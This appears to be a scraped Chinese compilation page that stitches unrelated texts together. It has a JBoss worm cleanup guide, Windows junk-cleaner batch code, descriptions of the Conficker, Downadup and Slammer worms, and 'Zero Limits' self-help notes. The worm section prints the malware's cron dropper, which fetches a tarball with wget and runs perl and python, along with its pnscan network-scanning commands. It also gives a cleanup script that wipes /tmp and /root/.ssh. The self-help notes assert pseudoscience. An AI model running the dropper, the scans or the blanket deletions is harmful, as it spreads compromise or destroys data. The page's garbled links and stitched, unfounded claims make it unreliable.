jboss蠕虫病毒清理步骤

最近在好几台机器上都发现jboss的蠕虫病毒，其表现的现象为机器速度慢，无明显的主机登陆信息，在jboss主目录的bin目录下，出现以kisses.tar.gz开头的多个文件。目前应用不能升级jboss（测试未通过），只能暂时处理一下。

1、在jboss运行的用户下，出现病毒定时下载任务，通过定时任务将病毒文件通过wget下载后解压缩后运行。

[root@localhost tmp]# crontab -l

1 1 10 * * /root/.sysdbs

1 1 1 * * /bin/sh /root/.toor.sh

1 1 1 * * /root/.toor.sh

1 1 10 * * /root/.sysdbs

[root@localhost tmp]# more /root/.toor.sh

cd /tmp;wget https://www.sodocs.net/doc/d312790282.html,/a.tar.gz;tar xzvf a.tar.gz;perl b.pl;python c.py

[root@localhost bin]# cd $JBOSS/bin

[root@localhost bin]# tar -tvf kisses.tar.gz

-rw-r--r-- toughc/toughc 1686 2002-03-26 00:39:14 Makefile

-rw-r--r-- toughc/toughc 3229 2002-03-26 00:34:47 bm.c

-rw-r--r-- toughc/toughc 460 2002-03-23 21:54:55 bm.h

-rw-r--r-- toughc/toughc 2939 2011-10-22 13:38:51 flu.pl

-rwxr-xr-x toughc/toughc 5598 2002-03-25 06:25:47 install-sh

-rwxr-xr-x toughc/toughc 132 2002-03-22 23:05:15 ipsort

-rw-r--r-- toughc/toughc 4337 2011-10-22 13:38:01 linda.pl

-rw-r--r-- toughc/toughc 20211 2002-03-26 00:37:04 pnscan.c

-rw-r--r-- toughc/toughc 25 2002-03-26 00:53:11 version.c

[root@localhost tmp]# find / -name pnscan

/tmp/zsa/pnscan

/usr/local/jboss-4.2.3.GA/bin/pnscan

[root@localhost tmp]# ps -ef |grep pnscan

root 754 21540 0 09:30 pts/3 00:00:00 grep pnscan

root 1003 32088 0 09:28 ? 00:00:00 sh -c ./pnscan -r JBoss -w "HEAD / HTTP/1.0\r\n\r\n" -t 6500 150.34.0.0/16 80 > /tmp/sess_0088025413980486928597bf150

root 1009 1003 0 09:28 ? 00:00:00 ./pnscan -r JBoss -w HEAD / HTTP/1.0\r\n\r\n -t 6500 150.34.0.0/16 80

root 24553 527 0 09:24 ? 00:00:00 sh -c ./pnscan -r JBoss -w "HEAD / HTTP/1.0\r\n\r\n" -t 6500 180.139.0.0/16 80 > /tmp/sess_0088025413980486928597bf180

root 24558 24553 0 09:24 ? 00:00:00 ./pnscan -r JBoss -w HEAD / HTTP/1.0\r\n\r\n -t 6500 180.139.0.0/16 80

2、通过对代码的分析，在系统中出现多个pnscan和/usr/share/jboss/tomcat进程，该病毒将病毒程序伪装为/usr/share/jboss/tomcat进程运行，实际上是通过perl程序调用，通过top 可以发现踪迹。

3、清理病毒，由于病毒程序，首先先结束病毒，然后对病毒程序进行删除，一下是病毒的清理脚本。

[root@localhost tmp]# more /tmp/killpnscan.sh

#/usr/bin/sh

# 清理病毒在内存中运行，如果pnscan清理不干净，需要手动杀进程

crontab -l

killall pnscan

killall perl

# 删除病毒文件

cd /usr/local/jboss-4.2.3.GA/bin/

rm -fr kiss*

rm -f flu.pl

rm -f bm.*

rm -f javadd.tar.gz

rm -f javadd.tar.gz*

rm -f lind?.pl

rm -f Makefile

rm -f nohup.out

rm -f pnscan*

rm -f version.*

rm -f install-sh

rm -f ipsort

rm -f jdb.tar.gz*

rm -f fly.pl

rm -f sysdbss*

rm -f treat.sh

rm -f /root/.ssh/*

rm -f goodknight.*

# 删除临时文件目录中的病毒

cd /tmp

rm -fr /tmp/.lime

rm -fr /tmp/za

rm -fr /tmp/zsa

rm -f /tmp/*

rm -fr /tmp/flu

rm -fr /root/.sysdbs

rm -fr /root/.toor.sh # 再次确认清理

killall pnscan

killall perl

ps -ef |grep pnscan

ps -ef |grep tomcat

crontab -r

4、至此，病毒文件清理完成，因其通过wget进行下载运行，建议将wget卸载。

rpm -e wget 附：

因此蠕虫病毒有tomcat引起的，影响的版本如下：

JBoss Application Server (AS) 4.0.x

JBoss Communications Platform 1.2

JBoss Enterprise Application Platform (EAP) 4.2, 4.3, 5.0 JBoss Enterprise Portal Platform (EPP) 4.3

JBoss Enterprise Web Platform (EWP) 5.0

JBoss SOA-Platform (SOA-P) 4.2, 4.3, 5.0

如何干净清除病毒

如何干净清除病毒, 一些通用清除病毒方法(推荐) 本文只是针对常见的已知病毒的一些通用的基本的清除方法，并不专门讨论针对某种或者某类病毒的清除方法，如果按照这些清除方法仍不能干净清除病毒，请参见相关的文章。 一、使用正确的杀毒方法 1、在安全模式或纯DOS模式下清除病毒 当计算机感染病毒的时候，很多人都会图方便，在正常模式下清除病毒，但这种方法往往是不能干净清除病毒的。 这里说的正常模式准确的说法应该是实模式（Real Mode），这里通俗点说了。其包括正 常模式的Windows和正常模式的Windows下的"MS-DOS方式"或"命令提示符"。 在正常模式下，由于带毒的文件正在运行，是无法对这些文件直接进行操作的。从现今的反病毒技术和病毒来看，绝大部分病毒都不可能在正常模式下简单的就可以彻底清除了的。很多一些朋友误以为只要装上反病毒软件，软件可以彻底清除计算机上的病毒，当病毒无法彻底清除的时候就认为软件不好，这是很错误的！ 建议在查杀病毒的时候，要在安全模式（Safe Mode）或者纯DOS下进行清除。特别的，对于现在大多数流行的病毒，如蠕虫病毒、木马程序和网页代码病毒等，都可以在安全模式下清除，不必要像以前那样必须要用软盘启动杀毒；但对于一些引导区病毒和感染可执行文件的病毒才需要在纯DOS下杀毒（建议用干净软盘启动杀毒）。而且，当计算机原来就感染了病毒，那就更需要在安装反病毒软件后（升级到最新的病毒库），在安全模式（Safe Mode）或者纯DOS下清除一遍病毒了！ 2、不建议使用网页在线杀毒 我想这也是很多朋友使用的杀毒方法，其实这种方法也是和上述的一样，同样无法彻底清除病毒，同时，由于利用了IE的特殊功能，会带来更多的安全隐患，而且一般反病毒厂商也不会提供全面的病毒库文件，所以这种方法充其量只能查出计算机上是否感染流行的病毒，而不能实际的进行清除病毒。而且，换个角度来看，如果这样就能干净清除病毒的话，那么厂商就没必要销售反病毒软件了。^o^ 二、带毒文件存在于特定的目录或文件中的清除方法 这里所说的是由于某些目录和文件的特殊性，无法直接清除（包括安全模式下杀毒等一些方式杀毒），而需要某些特殊手段清除的带毒文件。以下所说的目录均包含其下面的子目录。 1、带毒文件在\Temporary Internet Files目录下 由于这个目录下的文件，Windows会对此有一定的保护作用（未经证实）。 所以对这个目录下的带毒文件即使在安全模式下也不能进行清除，对于这种情况，请先关闭IE等一些程序软件，然后选择IE中的"工具"\"Internet选项"，选择"删除文件"删除即可，如果有提示"删除所有脱机内容"，也请选上一并删除。 2、带毒文件在\_Restore目录下，*.cpy文件中 这是系统还原存放还原文件的目录，只有在装了Windows Me/XP操作系统上才会有这个目录，由于系统对这个目录有保护作用。 对于这种情况需要先取消"系统还原"功能，然后将带毒文件删除，甚至将整个目录删除也是可以的。

零极限精华笔记

零极限 1.根本没有纯粹的外在这种东西，每件事物都同时以思想的形式存在于我的内心之中。 2.问题只是过去记忆的重播，是为了给我们一次机会，让我们重新用爱的眼光去看待这些记忆并根据灵感采取行动。 3.所有自身之外的事物都是一种内在的投射或压根就是一片幻象。 4.如果我想改变任何事，就要从自己的内在做起，而不是外在。 5.只需对自己在身体、思想或感情上经历任何问题时的状态进行察觉，一旦察觉到了，我的责任就是立刻开始清理。 6.实行清理这个方法，并不表示立即就会有结果，它的目的也不是为了取得什么结果，而是为了获得平静。 7.只要我想改善自己生命终点任何事物——从财务到人际关系，我只需要探求于我的内在就可以了。 8.我必须一直聚焦在“归零”这件事情上，没有记忆没有定式的零。 9.如果我将自己清理干净了，那么灵感来的时候，我只会采取行动，而不会想太多，如果我会多加考虑，那么我就是将灵感跟某样东西作比较，而那样东西就是记忆。 10.宇宙奖励了我的慷慨，我给出去的，宇宙会加倍偿付给我。 11.有太多人把自己锁死在一个想法上，试图强迫事情按照自己的预期发展，这样做只会把他们想获得的财富阻挡在外。

12.我见到的每一个人就是我的镜子，我所经历的也会被我共有，而清除这个共有的定式，我们就都会好起来。 13.零的信号就是“爱”，所以不断的说“我爱你”，会帮助我们调整到那个信号的频率。 零极限之生活篇 1.问题不存在于外在，我的问题只是记忆在潜意识里回放的方式，它就存在于我自己的内在。 2.当我为某件正在发生的事，而与他人起了争执时，这些都与当下时刻无关，因为他就仅仅是我的记忆回放而已。 3.感恩会改变我们的震动频率与能量，当我们同时全心地感谢，我们就立刻会感到平静，并且变成一块吸引美好的磁铁。 4.我们都把“别人如何看待我”这个问题就变得异常重要，而我们也开始向外寻求认可，更善于与别人较劲，并且在失控状态下忙着根据外在标准而追求完美。 5.是我们内在的某些事物才将特定的情境与人群吸引过来的，而且他们就是在模

自制一键清理系统垃圾bat

自制一键清理系统垃圾bat 大多数人都知道随着电脑使用时间边长，电脑中积累的垃圾文件会越来越多。通过安全软件来清除电脑中的垃圾是不错的方法，但是对于部分喜欢“轻量”应用的用户来说能够轻松一键的清理电脑垃圾是最理想的操作。 在Windows在安装和使用过程中都会产生相当多的垃圾文件，包括临时文件（如：*.tmp、*._mp）、临时帮助文件（*.gid）、磁盘检查文件（*.chk）、临时备份文件（如：*.old、*.bak）以及其他临时文件。特别是如果一段时间不清理IE的临时文件夹“TemporaryInternetFiles”，其中的缓存文件有时会占用上百MB的磁盘空间。这些LJ文件不仅仅浪费了宝贵的磁盘空间，严重时还会使系统运行慢如蜗牛。这点相信你肯定忍受不了吧！所以应及时清理系统的LJ文件的淤塞，保持系统的“苗条”身材，轻松流畅上网！朋友来吧，现在就让我们一起来快速清除系统垃圾吧！！下面是步骤很简单就两步！ 在电脑屏幕的左下角按“开始→程序→附件→记事本”，把下面的文字复制进去,点“另存为”，路径选“桌面”，保存类型为“所有文件”，文件名为“清除系统LJ.bat”，就完成了。记住后缀名一定要是.bat，ok！你的垃圾清除器就这样制作成功了！双击它就能很快地清理垃圾文件，大约一分钟不到。 复制下面代码粘贴到笔记本上： @echo offecho 《清理垃圾文件》 echo 正在清理系统垃圾文件，请稍等……echo 删除文件或目 录：%systemdrive%\*.tmpdel /f /s /q “%systemdrive%\*.tmp” echo 删除文件或目录：%systemdrive%\*._mpdel /f /s /q “%systemdrive%\*._mp” echo 删除文件或目录：%systemdrive%\*.giddel /f /s /q “%systemdrive%\*.gid” echo 删除文件或目录：%systemdrive%\*.chkdel /f /s /q “%systemdrive%\*.chk” echo 删除文件或目录：%systemdrive%\*.olddel /f /s /q “%systemdrive%\*.old” echo 删除文件或目录：%systemdrive%\recycled\*.*del /f /s /q “%systemdrive%\recycled\*.*” echo 删除文件或目录：%windir%\*.bakdel /f /s /q “%windir%\*.bak” echo 删除文件或目录：%windir%\prefetch\*.*del /f /s /q “%windir%\prefetch\*.*” echo 删除文件或目录：%windir%\temprd /s /q “%windir%\temp” & md “%windir%\temp” echo 删除文件或目录：%userprofile%\cookies\*.*del /f /q “%userprofile%\cookies\*.*”

《新零极限》经典浓缩版笔记

《新零极限》经典浓缩版笔记 新零极限 1. 清理时列出一张清单:写下人名包括记忆所及每一个与我们有过关系的人～以及我 们曾经造成的伤害—换言之就是列出所有想得起来～让人不堪回首的经历～课程鼓 励我们写下在潜意识里紧抓不放的所有耻辱、责难与罪恶感。 2. 和人发生性关系是吸取对方能量最快的途径～而且不只是我的性伴侣一个人的能 量～还包括所有与她发生性关系的人的能量----也就是说～当我与某人发生性关 系时～当下可能夹杂着数百人的能量。 3. 一切都是我内在的反射～一切都是一面镜子、都是一个共享的程式～当我清理时～ 我是在清理那个程式～并成为解决办法的一部分。 4. 发生在我生命中那些需要解决的问题～不是我的错～却是我的责任。 5. 当我花时间在某个人、某个地方或某样事物上～就会创造出一个连接我---一个跟着我们双方的无形连接～即使我离开了那个人、事、物或地方～他依然存在。 6. 神性才能决定什么是完美的结果～不是我。必须拥有这样的信心～才有办法放手: 我唯一需要努力去做的～就是找到内在的平静。

7. 我清理是为了处于当下～奇迹就在当下～力量就在当下～真正的奖赏就在当下。 8. 你的期望创造了你得到的结果。你不必有意识地知道那些期望是什么～因为你身边 的人、从你自己的过去～来推论你的期望是什么。 9. 当我相信了某件事时～我的信念通常就会让事情成真。 10. 信念塑造了现实～若我相信跟我自己或我的世界有关的某件事是真的～往往就会 吸引与之相符的状况发生。 11. 相信什么～比我周遭所谓的现实更重要～重要的不是现实而是信念。 12. 神奇的力量的确存在～我在物质世界的行动也是～而最聪明的做法就是将两者混合在一起。 13. 零极限唯一真正危险之处～也许就在于你完全之依赖它。0 14. 先说明反向意念。这个概念是～当我的意识想要某样东西时～我的无意识想要的 是另一样～这样的冲突使得事情无法有结果。。 15. 何谓受到灵感启发的行动～要将那些从我心里冒出来～然后出现在我清醒的现实 中的想法付诸行动。如果没有任何作为～什么事情都不会发生～所以以行动对成功 来说至关重要。 16. 显化自身实相的方式有三种: 1.预设:如果我不让自己有意识地参与自己的人生～其他人的行动和我自己的无意识就会为我创造我的实相。这就是没有觉醒的活法。

蠕虫病毒有什么危害如何杀

蠕虫病毒有什么危害如何杀 时间:2013-01-15 19:26来源:https://www.sodocs.net/doc/d312790282.html,作者:xp系统下载点击:170次电脑的蠕虫病毒是什么，会给电脑系统造成什么危害呢？“2003蠕虫王”（https://www.sodocs.net/doc/d312790282.html,Killer2003）感染该蠕虫病毒后网络带宽被大量占用，导致网络瘫痪，该蠕虫是利用SQL SERVER 2000 的解析端口1434的缓冲区溢出漏洞，对其网络进行攻击。由于“2003蠕虫王”具有极强的传播能力，目前在亚洲、美洲、澳大利亚等地迅速传播，已经造成了全球性的网络灾害。由于1月25日正值周末，其造成的恶果首先表现为公用互联网络的瘫痪，预计在今后几天继续呈迅速蔓延之势。 小编建议您使用360免费杀毒进行查杀，然后再根据查杀情况进行相应措施。 蠕虫病毒传播过程 2003蠕虫病毒是一个极为罕见的具有极其短小病毒体却具有极强传播性的蠕虫病毒。该蠕虫利用Microsoft SQL Server 2000缓冲区溢出漏洞进行传播，详细传播过程如下： 该病毒入侵未受保护的机器后，取得三个Win32 API地址，GetTickCount、socket、sendto，接着病毒使用GetTickCount获得一个随机数，进入一个死循环继续传播。在该循环中蠕虫使用获得的随机数生成一个随机的ip地址，然后将自身代码发送至1434端口（Microsoft SQL Server开放端口），该蠕虫传播速度极快，其使用广播数据包方式发送自身代码，每次均攻击子网中所有255 台可能存在机器。易受攻击的机器类型为所有安装有Microsoft SQL Server 2000的NT系列服务器，包括WinNT/Win2000/WinXP等。所幸该蠕虫并未感染或者传播文件形式病毒体，纯粹在内存中进行蔓延。病毒体内存在字符串 “h.dllhel32hkernQhounthickChGet”、“Qh32.dhws2_f”、“etQhsockf”、“toQhsend”。该病毒利用的安全漏洞于2002年七月被发现并在随后的MS SQL Server2000补丁包中得到修正。 蠕虫病毒的特征 该蠕虫攻击安装有Microsoft SQL 的NT系列服务器，该病毒尝试探测被攻击机器的1434/udp端口，如果探测成功，则发送376个字节的蠕虫代码。1434/udp 端口为Microsoft SQL开放端口。该端口在未打补丁的SQL Server平台上存在缓冲区溢出漏洞，使蠕虫的后续代码能够得以机 会在被攻击机器上运行进一步传播。 该蠕虫入侵MS SQL Server系统，运行于MS SQL Server 2000主程序sqlservr.exe应用程序进程空间，而MS SQL Server 2000拥有最高级别System 权限，因而该蠕虫也获得System级别权限。受攻击系统：未安装MS SQL

零极限全系列共七本书的全部笔记超浓缩

零极限重点笔记 1.所有自身之外的事物都是一种内在的投射或压根就是一片幻象。 2.如果我想改变任何事，就要从自己的内在做起，而不是外在。 3.我只需对自己在身体、思想或感情上经历任何问题时的状态进行察觉，一旦察觉 到了，我的责任就是立刻开始清理。 4.实行清理这个方法，并不表示立即就会有结果，它的目的也不是为了取得什么结 果，而是为了获得平静。清理不是为了解决某个问题或得到某个特定结果，而是利用零极限的方法持续清理内在小孩不断重播的记忆——这就是根本的清理做法。 5.如果我将自己清理干净了，那么灵感来的时候，我只会采取行动，而不会想太多， 如果我会多加考虑，那么我就是将灵感跟某样东西作比较，而那样东西就是记忆。 6.我必须一直聚焦在“归零”这件事情上，没有记忆没有定式的零。 7.宇宙奖励了我的慷慨，我给出去的，宇宙会加倍偿付给我。 8.有太多人把自己锁死在一个想法上，试图强迫事情按照自己的预期发展，这样做 只会把他们想获得的财富阻挡在外。 9.我见到的每一个人就是我的镜子，我所经历的也会被我共有，而清除这个共有的 定式，我们就都会好起来。 10.零的信号就是“爱”，所以不断的说“我爱你”，会帮助我们调整到那个信号的频 率。 11.对于我的现状，我不能怪罪于任何人或者任何事，我所能做的就是负起责任，也 就是接受它，拥有它，爱它。

12.是我们内在的某些事物才将特定的情境与人群吸引过来的，而且他们就是在模仿 我对待自己的方式来对待我，我如何对待自己，决定他人如何对待自己。 13.我们都把“别人如何看待我”这个问题就变得异常重要，而我们也开始向外寻求 认可，更善于与别人较劲，并且在失控状态下忙着根据外在标准而追求完美。由于自己的快乐是依附在其他人与外在环境的，这就造成我们持续地将力量虚耗。 14.应当让自己就像孩子一般没有任何信念，而后随遇而安，活在当下。 15.开始向自己的内在探寻，并理解自己不再需要瘾头及向外追求额外的东西才能让 自己快乐。一旦我们能够释放掉自己的记忆程序，评断、成见与期待之后，我们就能在对的时间里吸引一段适当的关系。 16.我们无法享受那份不确定感，所以总是倾向于去做那些能够带给我们安全感的 事。 17.当我允许神性来引导我，我就会发现自己在平衡之中，我能在绝佳的时机，得到 绝妙的点子与完美的关系，因为成功的某一部分就是找到适合的团队来支持我。 18.许多时候我们感到疑惑，并且倾向于用人们在物质上所拥有的一切作为自己成功 与否的标准。 19.如果我不能够与自己内在的富有与成功联系上的话，再多的钱也没法让我快乐。 20.成功是与我能否不去理会外在的人事物，坚持做自己并保持快乐与平静有关，我 所寻找的一切都在我自己内在的世界里面。 21.将自己自由释放，并且放手去做自己喜爱的事，我将用更简单的方式吸引成功到 来。 22.千万别把金钱放在第一位，我应该把感恩与爱放在第一位，当我这么做之后，金 钱自然会上门，这是真的。 23.我需要用爱完成我所热爱的事，承担百分之百的责任，并百分之百地全心投入。

Conficker清除方法

Conficker清除方法 清除Conficker蠕虫病毒详细步骤 2011-01-15 17:00 Conficker简介： Worm:Win32/Conficker.B.9.831 ，利用0867漏洞的蠕虫。 conficker蠕虫传播主要通过运行windows系统的服务器服务的缓冲区漏洞。它使用特定当在一台电脑中成功执行，它会禁用一些系统服务，比如windows系统更新，windows安全中心，告。然后他会连接一个服务器，在那里他会接到进一步传播的命令，收集个人信息，和下载安装附它还会把自己添加到必然会有的windows活动进程中，像是svchost.exe，explorer.exe和serv 被conficker蠕虫感染症状： 帐户锁定政策被自动复位。某些微软Windows服务会自动禁用，如自动更新，后台智能传和错误报告服务。域控制器对客户机请求回应变得缓慢。系统网络变得异常缓慢。这可以从检测的中看出。跟杀毒软件，windows系统更新有关的网站无法访问。另外它发射暴力密码破解攻击管理员共享。最好是把密码更换成更好的。 友情提示: 为了能更完整杀掉 win32.conficker病毒, 在打开本文中的连接时,请先点右键, 再在弹出的菜单中选"在新窗口中打开"。 清除Conficker蠕虫1(此方法适用于普通网民) 1:下载最新Conficker免疫补丁 https://www.sodocs.net/doc/d312790282.html,/downloads/details.aspx?displaylang=zh-cn&FamilyID=0d5f9b 支持的操作系统：Windows XP Service Pack 2; Windows XP Service Pack 3 https://www.sodocs.net/doc/d312790282.html,/downloads/details.aspx?displaylang=zh-cn&FamilyID=f26d39 Windows Server 2003 Service Pack 1; Windows Server 2003 Service Pack 2 2:打好补丁后,使用MSRT进行清除企业环境中MSRT的部署 Conficker蠕虫清除工具下载--conficker蠕虫专杀工具 https://www.sodocs.net/doc/d312790282.html,/kb/890830 （Windows 2000/XP/2003/）

两篇关于自我清理方法的文章

关于自我清理方法的两篇文章----- （整合了空椅子、零极限、系统排列等方法） 推荐一种自我清理方法 【前言】 内心的自我清理，实质是用爱的语言不断地去接纳自己潜意识的一切，接纳自己的所有想法、信念、情绪，那怕是邪恶的想法、非常负面的情绪。 当我们把它们接纳到一定程度之后，它们自然会被转化。 这个原理也是所有心灵成长的原理，所有的心灵成长都是在通过各种方式不断地接纳自己。 【具体操作】 首先，找一个物体，例如凳子、枕头，代表自己想清理的记忆。 例如，如果自己想清理的是自己的爱情，就用凳子代表“爱情方面的负面记忆”；如果是想清理金钱，那么就用凳子代表“金钱方面的负面记忆”；如果是想清理身体健康，则用凳子代表自己身体的某个部位，或者代表“健康方面的负面记忆”。 接着，对着这个物体念四句话：对不起，请原谅，谢谢你，我爱你。 【注意事项】 1.这样的方法看似简单，但是却比一直对着内心念四句话的效果好得多。 2.这种用凳子代表某某人事物的方法，实际上是结合了系统排列，它的功效在于可以让这件事物的信息附着在这个物品上，这件物品会拥有和被定义事物一样的能量场。 3.很多人不知道怎么直接跟内在小孩沟通，那么当用凳子来代表内在小孩或者内在小孩中的某部分记忆时，对着它说话，就相当于把自己潜意识的这部分记忆给提取出来，自己可以面对面地和内在小孩沟通，这个时候对着它说，效果比想象自己对着内在小孩说的效果更好。 4.这个时候，如果自己能够带有更多感情地对着凳子表达感谢之意，那么效果会更显著。 5.我们的所有的负面记忆和情绪都是人体的自我保护机制。 例如，愤怒、嫉妒、悲伤、恐惧等情绪，都是为了保护我们免受外界的伤害的，自责情绪是为了激励自己能够做得更好。身体的疾病，是为了提醒我们要好好爱惜身体的。 6.假设自己清理的是恐惧相关的负面记忆，那么可以试着这样对着恐惧说：“对不起，我一直没有接纳你，请原谅我，谢谢你用自己的方式保护着我，我爱你。” 如果是清理自己的身体健康，可以对着自己的身体说：“对不起，我一直没有照顾好你，请原谅我，谢谢你一直以来为我工作，我爱你。” 具体怎么说可以根据具体情况灵活发挥，最重要的是对自己内在的记忆、情绪以及身体表达感恩之情。 7.这些话如果说的时候是非常真心的，那么说一遍往往就有机械念零极限四句话100遍甚至1000遍以上的效果。 8.当自己清理得特别有感觉的时候，可能会突然特别想哭、想吼出来、想打嗝、干呕、放屁、打哈欠

Windows系统垃圾如何清理

回家后，在我们不断的使用过程中，因为添加、删除软件和上网冲浪等等行为，硬盘中会产生各种各样的垃圾文件，而随着这些垃圾文件的不断膨胀，它们不仅会平白吞噬掉我们宝贵的硬盘空间，更会拖累机器的运行速度，影响我们的工作效率。 一、垃圾文件的类型 1.软件安装过程中产生的临时文件 许多软件在安装时，首先要把自身的安装文件解压缩到一个临时目录（一般为Windows文件夹下的Temp目录）然后再进行安装。如果软件设计有疏忽或者系统有问题，当安装结束后，这些临时文件就会变得并不“临时”，成为硬盘里的一堆垃圾，很多时候它们以*.tmp的面孔出现。 2.软件运行过程中产生的临时文件 和安装过程一样，在软件的运行过程中通常也会产生一些临时交换文件，有些软件运行过后遗留下来的垃圾甚至多达数百兆，比如一些程序工作时产生的形如*.old、*.bak这样的备份文件，杀毒软件或系统软件检查硬盘时生成的备份文件等。 3.软件卸载后的遗留文件 由于Windows的反安装机制实在让人无法恭维，再加上多数软件都使用了动态链接库（DLL），而其中一些软件的设计还不太成熟，导致了很多软件“请神容易送神难”。当这些软件被卸载后，经常会在硬盘中留下一些文件夹、*.dll文件以及形形色色不知名的小东西，成为名副其实的垃圾。 在现实生活中，有很多初学者往往会错误地使用直接删除文件夹的方法“卸载”软件，这样就会留下更多无效的类似*.ini、*.dll这样的文件。同时还会在注册表中残存大量废弃数据，对系统的稳定造成更大影响。 4.上网冲浪产生的临时文件 我们在上网的时候，浏览器总是将网页文件下载到本地机器上，这些缓存文件不但占用了宝贵的磁盘空间，还常常会把我们的个人隐私公之于众，是可忍，孰不可忍。 5.一些不常用的鸡肋文件 比如一些应用软件自带的帮助或教程文件（常以.hlp等作为后缀），操作系统中多余的字体文件等。既然食之无味索性也将它们视作垃圾文件的一种表现。比如

w32.downadup.b蠕虫病毒详解及清除攻略

w32.downadup.b蠕虫病毒详解及清除攻略 最近经常到几个工厂走动，发现有的局域网都感染受了W32.Downadup.B蠕虫病毒。杀毒软件可以查杀，但是都不彻底，一边清除，一边又继续生成，让人不胜其烦。发这篇日志，就是让今后遇到该问题的朋友能够舒心点。 W32.Downadup.B可利用Microsoft Windows服务器服务RPC的远程代码执行漏洞进行传播，也可利用弱密码保护的网络共享进行感染。W32.Downadup.B会在硬盘上新建autorun.inf 文件，若用户进入硬盘空间，恶意代码便会自动运行。同时，它还会监控是否有其他可移动存储设备连接到已感染病毒的计算机上。一旦连接，此蠕虫病毒会在这个新硬盘空间建立一个autorun.inf文件。此外，W32.Downadup.B还会监测计算机发出的DNS请求中是否有某些特定字符串，并以“超时，访问不成功”的方式阻止计算机访问某些网站（如安全更新网站）。这意味着受感染的计算机可能无法安装补丁或更新杀毒软件，从而无法清除病毒威胁。 W32.Downadup.B病毒介绍 Worm:W32/Downadup.AL [F-Secure], Win32/Conficker.B [Computer Associates], W32/Confick-D [Sophos], WORM_DOWNAD.AD [Trend], Net-Worm.Win32.Kido.ih [Kaspersky] 蠕虫 Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows Vista, Windows XP W32.Downadup.B是蠕虫病毒，通过攻击 Microsoft Windows Server Service RPC Handling 远程编码执行漏洞 (BID 31874) 进行传播。它还尝试传播到弱密码保护的网络共享，并阻止访问与安全相关的网站。W32.Downadup.B病毒会修改 tcpip.sys 文件。 一旦执行，蠕虫会检查下列注册表项是否存在，如果不存在将创建这些注册表项： * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\"dl" = "0" * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Applets\"dl" = "0" * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\"ds" = "0" * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Applets\"ds" = "0" 然后，它会将其自身复制为下列文件中的一个或多个： * %ProgramFiles%\Internet Explorer\[RANDOM FILE NAME].dll * %ProgramFiles%\Movie Maker\[RANDOM FILE NAME].dll * %System%\[RANDOM FILE NAME].dll * %Temp%\[RANDOM FILE NAME].dll * C:\Documents and Settings\All Users\Application Data \[RANDOM FILE NAME].dll 它创建具有下列特征的新服务： 服务名称：[PATH TO WORM] 显示名称：[WORM GENERATED SERVICE NAME] 启动类型：自动 接下来通过创建下列的注册表项注册为服务： * HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\[WORM GENERATED SERVICE NAME]\Parameters\"ServiceDll" = "[PATH TO WORM]" * HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\[WORM GENERATED SERVICE NAME]\"ImagePath" = %SystemRoot%\system32\svchost.exe -k netsvcs

《零极限》读后感

读《零极限》有感 这是本难懂的书，我翻开书的第一眼就这么认为。书中宣传是来自夏威夷的一种心灵疗法，读起来很难理解，一开始甚至如同嚼蜡，读到没几页我就准备放弃，但是关上书心中总觉遗憾，于是狠了心翻开继续读了下去。直到后来，我深有体会，幸好当时没有错过。 书中一开始就明确的介绍了一种夏威夷古老心法，它提倡释放内心的有害能量，让个人通过感恩与忏悔将耗费于记忆中的能量，转化为接收灵感的能量。作者乔·维泰利从初次听闻有一位神秘人物“用一种特殊的方法治疗好了精神病院的所有病人”而兴致大增，也开始了漫长的追寻之路。功夫不负有心人，作者经过一番努力终于结识了这位什么人，而之后不管是邮件来往还是约邀谋面，修·蓝博士这位传说中的神秘人带给所有接触过他的人的震撼都难以言表，一件件神奇的事情、一个个奇迹的诞生、一次次灵性的体验完全融化了作者和所有参与的人们。 “对不起，请原谅，谢谢你，我爱你！” 依旧是这四句简短的，被所有灵修界的朋友所喜爱的文字。作者称为“荷欧波若波若”大我意识法，一种释放内心有害能量的古老心法。这里不得不提到另外一个理念就是“吸引力法则，大致讲的是：我们向宇宙下一个订单，然后保持正向的思维、情绪，就能吸引来自己想要的东西。这里就会遇到一个问题，就是如何保持正向的思维、情绪，保持正面的能量，来吸引自己真正想要的东西呢？那就需要我们做好三个功课，就是“忏悔”和“感恩”、“宽恕”。

《零极限》的观点是记忆是一切问题的根源；我们不是依照内在神性的灵感行事，就是按照记忆行事；我们不仅要为自己的所思所感所想所行负责，还要为出现在我们生活中的其他人的所思所感所想所行负责，因为我们是自己生命、生活、境遇的创造者，我们遇到的问题都是自己的问题，我们生活中其他人的问题也是我们自己的问题，是因为我们内在有这样的问题，才会吸引来这样的境遇。 我们要向自己的内在神性祈祷，祈祷内在的神帮助我们得到我们自己的宽恕；遇到问题我们要向内寻求，而不是向外寻求解决方案，我们要不断清理自己内心的记忆，达到归0状态，这样才可以解决生活中的问题；遇到问题，反复对自己的内心念：“对不起、我爱你、请原谅、谢谢你”这不只是一句口号，这是教给我们清理办法的咒语！也许你会好奇，何为清理？为什么要清理？清理可以解决一切问题吗？ 答案是肯定的。自己周遭的一切都只是潜意识记忆的重播，完全可以用清理归零的方法接收灵性。用书中的意思来说：对于任何的内在和外在的事物，自己都负有百分之百的责任！自己所看到、碰到、遇到和听到的一切，都只是自己内在的映射，就算是自己身体有恙，也是潜意识与您的一种交流方式，自己对于这一切负有百分之百的责任，必须坚信不疑！而要解决这所有的问题，只有一种办法：清理、清理、再清理！ 《零极限》说得很有道理，事情到底应该怎么样不是由我们的意识说得算，我们思想中很多只是记忆的累积而已。我们被记忆控制、

新发病毒处理及样本提取方法

新发病毒处理及样本提取方法 1、首先确定病毒源，断开其网络（蠕虫病毒，ARP病毒），阻断传播途径： 2、检查可疑进程： 利用Icesword工具或系统“任务管理器”查看进程，其中Icesword工具可有效显示可疑进程调用文件目录，根据此目录，提取此文件样本，并可直接通过右键中的“结束进程”杀死可疑进程；或在“命令提示符”中输入“ntsd –c q –p PID（进程ID）”结束进程。 注：如果系统EXE文件无法打开，可将Icesword.exe改为https://www.sodocs.net/doc/d312790282.html,再执行。

